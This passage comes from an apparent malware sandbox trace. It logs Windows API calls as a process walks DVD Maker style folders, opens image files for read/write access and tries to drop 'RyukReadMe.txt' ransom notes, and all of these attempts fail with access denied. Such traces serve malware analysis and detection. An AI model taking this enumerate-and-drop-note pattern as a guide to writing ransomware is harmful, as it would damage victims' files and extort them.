Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.684] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.684] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.684] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.685] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.685] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.685] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.685] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.685] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.685] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.685] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.685] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.685] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png", dwFileAttributes=0x80) returned 0 [0133.685] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\shatter.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\shatter.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.686] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.686] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.686] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.686] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.686] SetLastError (dwErrCode=0x0) [0133.686] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.689] GetLastError () returned 0x5 [0133.689] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.689] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.689] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.689] SetLastError (dwErrCode=0x0) [0133.689] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.689] GetLastError () returned 0x5 [0133.689] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.689] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.689] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.691] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.691] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.691] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.691] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0133.691] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.691] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.691] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.691] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.691] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.691] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png", dwFileAttributes=0x80) returned 0 [0133.692] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\mainscroll.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.692] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.692] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.692] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.692] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.693] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.693] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.693] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.693] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.693] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.693] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.693] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.693] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.693] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.693] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.693] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.694] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.694] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.694] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.694] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.694] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.694] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.694] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.694] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.694] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.695] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.695] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.695] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.695] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.695] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.695] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.695] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.695] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.695] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.695] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.695] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.696] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.696] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.696] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.696] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.696] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.696] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png", dwFileAttributes=0x80) returned 0 [0133.696] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\scenesscroll.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.696] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.696] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.696] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.696] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.697] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png", dwFileAttributes=0x80) returned 0 [0133.697] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialmainsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.697] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.697] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.697] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.697] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.697] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.697] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.697] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.697] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.698] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.698] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.698] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.698] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.699] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.699] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.699] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.699] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.699] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.699] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.699] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.699] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.699] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.699] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.699] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.700] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.700] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.700] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.700] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.700] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.700] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0133.700] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.700] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.700] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.700] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.700] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.701] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.701] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.701] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.701] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.702] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.702] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.702] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png", dwFileAttributes=0x80) returned 0 [0133.702] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialoccasion.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialoccasion.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.702] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.702] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.702] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.702] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.702] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png", dwFileAttributes=0x80) returned 0 [0133.702] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitemask1047.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\whitemask1047.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.702] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.703] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.703] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.703] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.703] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png", dwFileAttributes=0x80) returned 0 [0133.703] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\whitevignette1047.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\whitevignette1047.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.703] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.703] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.703] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.703] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.704] SetLastError (dwErrCode=0x0) [0133.704] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.707] GetLastError () returned 0x5 [0133.707] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.707] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.707] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.707] SetLastError (dwErrCode=0x0) [0133.707] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.707] GetLastError () returned 0x5 [0133.707] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.707] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.707] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.708] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.708] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.708] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.708] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png", dwFileAttributes=0x80) returned 0 [0133.709] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\CircleSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\circlesubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.709] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.709] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.709] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.709] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.709] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD 